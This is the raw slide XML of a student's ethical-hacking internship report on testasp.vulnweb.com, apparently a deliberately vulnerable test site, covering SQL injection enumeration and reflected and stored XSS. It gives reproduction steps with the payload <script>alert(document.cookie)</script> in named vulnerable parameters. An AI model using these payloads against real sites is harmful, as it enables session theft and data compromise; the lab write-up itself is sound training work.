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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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658ed4d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b658ed4d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b658ed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b658ed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b658ed4d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b658ed4d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658ed4d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658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4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b658ed4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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d3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b658ed4d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b658ed4d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b658ed4d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b658ed4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b658ed4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b658ed4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b658ed4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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4d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b658ed4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b658ed4d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VlQAHUpDroqBb20nOnGtJrFFw6Jv6QmJ/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testasp.vulnweb.com/Search.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Sir96MSvAN-zfvOvqf_uXD5X6u9M0WOL/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mailto:veydanefyu@yevme.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testasp.vulnweb.com/showforum.asp?id=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testasp.vulnweb.com/showforum.asp?id=X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drive.google.com/file/d/1U0YVlONwoWgnecYHpwpY_xoyziLEmpcs/view" TargetMode="Externa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testasp.vulnweb.com/showforum.asp?id=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D2E9"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="045962"/>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95650"/>
            <a:ext cx="8520600" cy="311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Ethical Hacking Internship</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>(25 July 2021 - 27 Aug 2021)</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>Submitted BY:</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>Avaneesh Jha</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>(vipavaneesh@gmail.com)</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="288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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TASK 3</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10" name="Google Shape;110;p22"/>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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Database Names list:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="Google Shape;111;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="945980"/>
            <a:ext cx="8229600" cy="393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17" name="Google Shape;117;p23"/>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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Table list of Specified Database:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="Google Shape;118;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="946280"/>
            <a:ext cx="8229600" cy="393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24" name="Google Shape;124;p24"/>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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Column list of Specified Table:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="Google Shape;125;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="946800"/>
            <a:ext cx="8229600" cy="393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31" name="Google Shape;131;p25"/>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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Column entries of Specified Columns of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Specified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Table:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132" name="Google Shape;132;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1064325"/>
            <a:ext cx="4500000" cy="3934800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Google Shape;133;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1064325"/>
            <a:ext cx="4500000" cy="393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259200" y="6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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>upporting Material/References:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="576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Video Demonstration:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://drive.google.com/file/d/1VlQAHUpDroqBb20nOnGtJrFFw6Jv6QmJ/view?usp=sharing</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="Google Shape;140;p26" title="Task3sql.mp4">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396000" y="1440000"/>
            <a:ext cx="8229600" cy="345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Impact:-</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The attacker can:-</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Retrieve highly confidential data like login credentials , hash keys ,user related data etc.</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Execute any stored procedure or any malicious query.</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Dump the whole database and remove all the essential details.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Manipulate the whole database as per their choice.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Can lead to Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication.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Make the user details public.</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GB"/>
              <a:t>Reflected and Stored Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Found in http://testasp.vulnweb.com</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143250"/>
            <a:ext cx="86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20"/>
              <a:t>1)Reflected Cross Site scripting found in Search post input Field</a:t>
            </a:r>
            <a:endParaRPr sz="2320"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p29"/>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rPr>
              <a:t>Summary:-</a:t>
            </a:r>
            <a:endParaRPr b="1">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Reflected cross site scripting found at the search post input field of testasp.vulnweb.com at url http://testasp.vulnweb.com/Search.asp detected using payload &lt;script&gt;alert(document.cookie)&lt;/script&gt;. As per OWASP's definition: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. "</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In our website it is happening because one of the GET parameters "tfSearch" does not properly sanitize/escape user input, allowing an injection to occur.</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Reproduce:-</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An attacker can reproduce the attack by doing the following:</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Go to the Search tab of testasp.vulnweb.com i.e at the url </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/Search.asp</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In the search input field enter the payload : &lt;script&gt;alert(document.cookie)&lt;/script&gt;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69" name="Google Shape;169;p31"/>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1) Entering Payload to the search input field:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="170" name="Google Shape;170;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="393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GB"/>
              <a:t>SQL Injection Vulnerability Found in </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>http://testasp.vulnweb.com</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76" name="Google Shape;176;p32"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Injection Demonstration:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="177" name="Google Shape;177;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="393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83" name="Google Shape;183;p33"/>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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) GET Request &amp; Response POC:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184" name="Google Shape;184;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="393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259200" y="6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Supporting Material/References:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="576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Video Demonstration:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://drive.google.com/file/d/1Sir96MSvAN-zfvOvqf_uXD5X6u9M0WOL/view?usp=sharing</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Google Shape;191;p34" title="Task3RXSS.mp4">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396000" y="1440000"/>
            <a:ext cx="8229600" cy="345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Impact:-</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rPr>
              <a:t>Attacker can:-</a:t>
            </a:r>
            <a:endParaRPr b="1">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The attacker can execute malicious javascript code in the vulnerable application.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Perform any action within the application that the user can perform.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View any information that the user is able to view.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Modify any information that the user is able to modify.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Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.</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2)Stored Cross Site Scripting found in Message Subject</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="385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Summary:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored Cross site Scripting vulnerability found in the Message Subject input field at url “http://testasp.vulnweb.com/showthread.asp?id=XX “ where XX is any valid and available Id number.As per definition given by www.portswigger.net ,Stored cross-site scripting (also known as second-order or persistent XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In our website it is happening due a parameter “tfSubject” present in the POST request (this request is generated when the Post it button in the Message Post Box is clicked to post the message) which do not sanitizes the user input allows the injection to occur.</a:t>
            </a:r>
            <a:endParaRPr sz="19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Reproduce:-</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To reproduce this attack the attacker first requires to create a fake account on the website by registering, then login and performing the following steps:-</a:t>
            </a:r>
            <a:endParaRPr>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Go to forums and select any category as target.</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Select any thread as target from the thread list.</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Now in the Message Post box, in the Message Subject enter the payload like &lt;script&gt;alert(document.cookie)&lt;/script&gt;.</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May or may not write in the message text space and click on Post it.</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Reproduce (Continued...) :-</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3649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GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What I have Done:-</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Created a new account with username misterhacker, real name Elwan Twain,Email id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>veydanefyu@yevme.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (generated &amp; copied from https://tempmail.net/ ) and Password password.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login Using the username misterhacker and Password password.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Went to forum section, selected the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Acunetix Web Vulnerability Scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> category and then selected the thread “aaa”.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In the Message Post Box, in the Message subject input field entered the payload “&lt;script&gt;alert(document.cookie)&lt;/script&gt;” and in the Message text space entered the payload  “&lt;script&gt;alert(1234)&lt;/script&gt;”. Then clicked on Post it button.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the message got posted only the payload entered in the Message Subject  input field reflected.</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221" name="Google Shape;221;p39"/>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1) Entering Payload in the Message Subject:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Google Shape;222;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="393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228" name="Google Shape;228;p40"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) POST Request &amp; Response POC:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="229" name="Google Shape;229;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="946800"/>
            <a:ext cx="8229600" cy="393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235" name="Google Shape;235;p41"/>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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) GET Request &amp; Response POC:-</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236" name="Google Shape;236;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
